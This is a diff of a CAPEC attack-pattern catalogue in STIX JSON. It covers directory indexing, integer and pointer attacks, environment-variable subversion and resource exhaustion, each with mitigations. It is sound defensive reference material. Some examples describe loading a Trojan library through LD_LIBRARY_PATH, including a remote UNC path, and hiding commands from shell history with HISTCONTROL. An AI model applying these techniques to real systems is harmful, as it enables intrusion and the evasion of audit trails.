"created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c194fece-6855-4a0e-b03b-6033e9f80f4d", - "source_ref": "course-of-action--868ce927-2671-4b33-b1c3-43a0804db42e", + "id": "relationship--5af295c0-cc26-47df-aabd-6091ac0f4867", + "source_ref": "course-of-action--6c587fe5-89a0-42b2-a2ff-ef9b15773cf7", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a4c09bb6-acdc-4712-980d-bf0425fd7bc7" + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "name": "coa-126-9", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Use indirect references rather than actual file names.", "type": "course-of-action", - "id": "course-of-action--0724227e-ebfe-4a31-a6c1-f2efae56cb23" + "id": "course-of-action--92a14d9f-b461-40db-9a7e-00ac104eb828" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--194d8d85-1150-4f84-ba01-3189c6a38cea", - "source_ref": "course-of-action--0724227e-ebfe-4a31-a6c1-f2efae56cb23", + "id": "relationship--74fa2e15-cdae-495a-9942-01806f15ac6d", + "source_ref": "course-of-action--92a14d9f-b461-40db-9a7e-00ac104eb828", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a4c09bb6-acdc-4712-980d-bf0425fd7bc7" + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "name": "coa-126-10", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Use possible permissions on file access when developing and deploying web applications.", "type": "course-of-action", - "id": "course-of-action--92a98fdf-e5e4-4e90-8fe8-21de71ac3c5d" + "id": "course-of-action--2248876f-47b7-4818-9150-38be47817f40" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--3a24dca2-2720-4b82-8b7c-ed2b1beb99a7", - "source_ref": "course-of-action--92a98fdf-e5e4-4e90-8fe8-21de71ac3c5d", + "id": "relationship--54391f32-58d7-44a3-af1d-14d83cb886e7", + "source_ref": "course-of-action--2248876f-47b7-4818-9150-38be47817f40", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a4c09bb6-acdc-4712-980d-bf0425fd7bc7" + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "name": "coa-126-11", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification -- whitelisting approach.", "type": "course-of-action", - "id": "course-of-action--9953201a-e853-49b4-8ef4-c440e23164c6" + "id": "course-of-action--1da8555a-673e-49d9-a3a6-fa1404b9d1a9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--74c9c3ab-16bd-4e84-8129-f66d834f6b7b", - "source_ref": "course-of-action--9953201a-e853-49b4-8ef4-c440e23164c6", + "id": "relationship--b4b6093c-6dee-4797-a60d-79cda0f1293b", + "source_ref": "course-of-action--1da8555a-673e-49d9-a3a6-fa1404b9d1a9", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a4c09bb6-acdc-4712-980d-bf0425fd7bc7" + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633" }, { "name": "Directory Indexing", "description": "An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -3709,90 +3738,91 @@ "\n The adversary uses directory listing to view sensitive files in the application. This is an example of accessing the backup file. The attack issues a request for http://www.example.com/admin/ and receives the following dynamic directory indexing content in the response: Index of /admin Name Last Modified Size Description backup/ 31-May-2007 08:18 - Apache/ 2.0.55 Server at www.example.com Port 80\n The target application does not have direct hyperlink to the \"backup\" directory in the normal html webpage, however the attacker has learned of this directory due to indexing the content. The client then requests the backup directory URL and receives output which has a \"db_dump.php\" file in it. This sensitive data should not be disclosed publicly.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--0cd27b19-f345-46d5-9691-c230bd9004ee" + "id": "attack-pattern--6c510676-03ad-4a8e-835b-f2caea51b785" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-127-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "1. Using blank index.html: putting blank index.html simply prevent directory listings from displaying to site visitors.", "type": "course-of-action", - "id": "course-of-action--b9b3b423-2373-4c0b-a761-e7701618bbd4" + "id": "course-of-action--52ef316b-8bda-44a7-962e-41f8a0b47c62" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--4cddd26c-a5ce-4c06-af66-f0f29cf11a66", - "source_ref": "course-of-action--b9b3b423-2373-4c0b-a761-e7701618bbd4", + "id": "relationship--75f29bbb-4c75-473b-b539-94f37ac9dd22", + "source_ref": "course-of-action--52ef316b-8bda-44a7-962e-41f8a0b47c62", "relationship_type": "mitigates", - "target_ref": "attack-pattern--0cd27b19-f345-46d5-9691-c230bd9004ee" + "target_ref": "attack-pattern--6c510676-03ad-4a8e-835b-f2caea51b785" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-127-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "2. Preventing with .htaccess in Apache web server: In .htaccess, write \"Options-indexes\".", "type": "course-of-action", - "id": "course-of-action--9b1b7852-6552-4a06-aa00-492d94e79c83" + "id": "course-of-action--375c2715-0a0f-4d58-bbf6-e79d12e250f5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--41cc1699-dcf2-485c-92b1-e11e551a1393", - "source_ref": "course-of-action--9b1b7852-6552-4a06-aa00-492d94e79c83", + "id": "relationship--a68920c3-bc51-419d-aeab-76c0de9d2e7a", + "source_ref": "course-of-action--375c2715-0a0f-4d58-bbf6-e79d12e250f5", "relationship_type": "mitigates", - "target_ref": "attack-pattern--0cd27b19-f345-46d5-9691-c230bd9004ee" + "target_ref": "attack-pattern--6c510676-03ad-4a8e-835b-f2caea51b785" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-127-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "3. Suppressing error messages: using error 403 \"Forbidden\" message exactly like error 404 \"Not Found\" message.", "type": "course-of-action", - "id": "course-of-action--e9fbea2b-373c-47a2-a430-59e303464fa1" + "id": "course-of-action--47ff9928-47a5-430a-ab40-693332919418" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--90b77c82-be9e-4fe2-b9c8-18e11bba83ac", - "source_ref": "course-of-action--e9fbea2b-373c-47a2-a430-59e303464fa1", + "id": "relationship--209a3806-a657-478d-9382-2cc64291f6a0", + "source_ref": "course-of-action--47ff9928-47a5-430a-ab40-693332919418", "relationship_type": "mitigates", - "target_ref": "attack-pattern--0cd27b19-f345-46d5-9691-c230bd9004ee" + "target_ref": "attack-pattern--6c510676-03ad-4a8e-835b-f2caea51b785" }, { "name": "Integer Attacks", "description": "An attacker takes advantage of the structure of integer variables to cause these variables to assume values that are not expected by an application. For example, adding one to the largest positive integer in a signed integer variable results in a negative number. Negative numbers may be illegal in an application and the application may prevent an attacker from providing them directly, but the application may not consider that adding two positive numbers can create a negative number do to the structure of integer storage formats.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -3818,15 +3848,16 @@ ], "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--da85a555-d1c8-4029-ac2d-7a4b93c228b8" + "id": "attack-pattern--85138b01-6c08-4c77-aebb-12d28c5c488f" }, { "name": "Pointer Manipulation", "description": "This attack pattern involves an adversary manipulating a pointer within a target application resulting in the application accessing an unintended memory location. This can result in the crashing of the application or, for certain pointer values, access to data that would not normally be possible or the execution of arbitrary code. Since pointers are simply integer variables, Integer Attacks may often be used in Pointer Attacks.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -3861,18 +3892,19 @@ ], "x_capec_abstraction": "Meta", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--b7a426a3-c329-4ebc-9cd4-1a6071228248" + "id": "attack-pattern--4ce66943-e754-4fcf-bdaf-81660eb6597b" }, { "name": "Subverting Environment Variable Values", "description": "The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -3960,118 +3992,119 @@ "x_capec_abstraction": "Detailed", "x_capec_example_instances": [ "Changing the LD_LIBRARY_PATH environment variable in TELNET will cause TELNET to use an alternate (possibly Trojan) version of a function library. The Trojan library must be accessible using the target file system and should include Trojan code that will allow the user to log in with a bad password. This requires that the attacker upload the Trojan library to a specific location on the target. As an alternative to uploading a Trojan file, some file systems support file paths that include remote addresses, such as \\\\172.16.2.100\\shared_files\\trojan_dll.dll. See also: Path Manipulation (CVE-1999-0073)", - "The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that \u201c ls\u201d will not be saved, but \u201cls\u201d would be saved by history. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands." + "The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that \" ls\" will not be saved, but \"ls\" would be saved by history. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands." ], "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--e271e8f1-236d-48f8-80a0-2713d2ddf122" + "id": "attack-pattern--efcdef38-7fc5-4913-9a35-918becaa621b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-13-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Protect environment variables against unauthorized read and write access.", "type": "course-of-action", - "id": "course-of-action--80d16070-b40f-4840-97d7-0c521f0a7c44" + "id": "course-of-action--10a1cb24-88c0-4d99-a60d-ff3df2e2b003" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--344bc17d-8f80-4985-9beb-8b8a5b06a416", - "source_ref": "course-of-action--80d16070-b40f-4840-97d7-0c521f0a7c44", + "id": "relationship--0a7232a7-068b-4945-a0bc-2f4a68fb21d7", + "source_ref": "course-of-action--10a1cb24-88c0-4d99-a60d-ff3df2e2b003", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e271e8f1-236d-48f8-80a0-2713d2ddf122" + "target_ref": "attack-pattern--efcdef38-7fc5-4913-9a35-918becaa621b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-13-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Protect the configuration files which contain environment variables against illegitimate read and write access.", "type": "course-of-action", - "id": "course-of-action--55cb60ee-5392-4af6-bac9-c9917f888ca1" + "id": "course-of-action--544e485d-ae4a-4bad-b117-6340b93eda38" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--bb3eada8-7b0c-4d91-9ab9-abe7f3ad6628", - "source_ref": "course-of-action--55cb60ee-5392-4af6-bac9-c9917f888ca1", + "id": "relationship--69c020c1-0771-4e9f-b36f-9b3d369974a7", + "source_ref": "course-of-action--544e485d-ae4a-4bad-b117-6340b93eda38", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e271e8f1-236d-48f8-80a0-2713d2ddf122" + "target_ref": "attack-pattern--efcdef38-7fc5-4913-9a35-918becaa621b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-13-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system.", "type": "course-of-action", - "id": "course-of-action--7d4c1c31-423f-4ba2-a07a-9bbd8dd662dd" + "id": "course-of-action--e9321d2d-a62c-4f97-bac1-3a29e9ed5b43" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--663f3d8a-0a69-4b17-ba3c-41bc0d377b24", - "source_ref": "course-of-action--7d4c1c31-423f-4ba2-a07a-9bbd8dd662dd", + "id": "relationship--e54b555f-10e3-4a42-b769-0664f0a2ff3c", + "source_ref": "course-of-action--e9321d2d-a62c-4f97-bac1-3a29e9ed5b43", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e271e8f1-236d-48f8-80a0-2713d2ddf122" + "target_ref": "attack-pattern--efcdef38-7fc5-4913-9a35-918becaa621b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-13-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Apply the least privilege principles. If a process has no legitimate reason to read an environment variable do not give that privilege.", "type": "course-of-action", - "id": "course-of-action--a9a0b7dc-d59d-4ed6-a0f5-ca186e65ab47" + "id": "course-of-action--45721c66-c4ff-4ca9-b2ba-52361fe49917" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--8d5032ed-7b9d-4633-af17-8b42e56d8c67", - "source_ref": "course-of-action--a9a0b7dc-d59d-4ed6-a0f5-ca186e65ab47", + "id": "relationship--6cf9642e-3760-492e-a5eb-edd19b425bed", + "source_ref": "course-of-action--45721c66-c4ff-4ca9-b2ba-52361fe49917", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e271e8f1-236d-48f8-80a0-2713d2ddf122" + "target_ref": "attack-pattern--efcdef38-7fc5-4913-9a35-918becaa621b" }, { "name": "Excessive Allocation", "description": "An adversary causes the target to allocate excessive resources to servicing the attackers' request, thereby reducing the resources available for legitimate services and degrading or denying services. Usually, this attack focuses on memory allocation, but any finite resource on the target could be the attacked, including bandwidth, processing cycles, or other resources. This attack does not attempt to force this allocation through a large number of requests (that would be Resource Depletion through Flooding) but instead uses one or a small number of requests that are carefully formatted to force the target to allocate excessive resources to service this request(s). Often this attack takes advantage of a bug in the target to cause the target to allocate resources vastly beyond what would be needed for a normal request.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -4110,115 +4143,116 @@ "In an Integer Attack, the adversary could cause a variable that controls allocation for a request to hold an excessively large value. Excessive allocation of resources can render a service degraded or unavailable to legitimate users and can even lead to crashing of the target." ], "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--defb6017-368d-4c28-bbc7-c4fabaf786f8" + "id": "attack-pattern--289251fd-9402-48a7-aee0-28b8ba2b3e41" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-130-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Limit the amount of resources that are accessible to unprivileged users.", "type": "course-of-action", - "id": "course-of-action--4ad63f1e-d877-475b-996f-78372649d498" + "id": "course-of-action--71e1e7e8-78ad-407e-9824-3aaeb49440eb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--ffa4f4cd-af0c-4480-b839-8d8775abbca4", - "source_ref": "course-of-action--4ad63f1e-d877-475b-996f-78372649d498", + "id": "relationship--e6867382-02a5-45fe-aff0-11c524c9b7d3", + "source_ref": "course-of-action--71e1e7e8-78ad-407e-9824-3aaeb49440eb", "relationship_type": "mitigates", - "target_ref": "attack-pattern--defb6017-368d-4c28-bbc7-c4fabaf786f8" + "target_ref": "attack-pattern--289251fd-9402-48a7-aee0-28b8ba2b3e41" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-130-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Assume all input is malicious. Consider all potentially relevant properties when validating input.", "type": "course-of-action", - "id": "course-of-action--ed17989a-ddad-4ff7-8248-44bd9ffd5b34" + "id": "course-of-action--bf09c080-4504-4328-ad60-28b0e4364df5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f59fa2e8-538e-4954-bf28-eac5663b0922", - "source_ref": "course-of-action--ed17989a-ddad-4ff7-8248-44bd9ffd5b34", + "id": "relationship--5c02a22b-6aea-4603-8d2c-5eb93c5a45c5", + "source_ref": "course-of-action--bf09c080-4504-4328-ad60-28b0e4364df5", "relationship_type": "mitigates", - "target_ref": "attack-pattern--defb6017-368d-4c28-bbc7-c4fabaf786f8" + "target_ref": "attack-pattern--289251fd-9402-48a7-aee0-28b8ba2b3e41" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-130-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Consider uniformly throttling all requests in order to make it more difficult to consume resources more quickly than they can again be freed.", "type": "course-of-action", - "id": "course-of-action--fea0424a-1dce-453e-8abf-670005b22440" + "id": "course-of-action--fe3ebc18-c3f2-4cc8-8740-7059cbd69c4c" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--1692fc27-4abb-44ea-a500-d70deaefac52", - "source_ref": "course-of-action--fea0424a-1dce-453e-8abf-670005b22440", + "id": "relationship--3050a257-2430-4ad9-a747-b6f45af0416f", + "source_ref": "course-of-action--fe3ebc18-c3f2-4cc8-8740-7059cbd69c4c", "relationship_type": "mitigates", - "target_ref": "attack-pattern--defb6017-368d-4c28-bbc7-c4fabaf786f8" + "target_ref": "attack-pattern--289251fd-9402-48a7-aee0-28b8ba2b3e41" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-130-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + 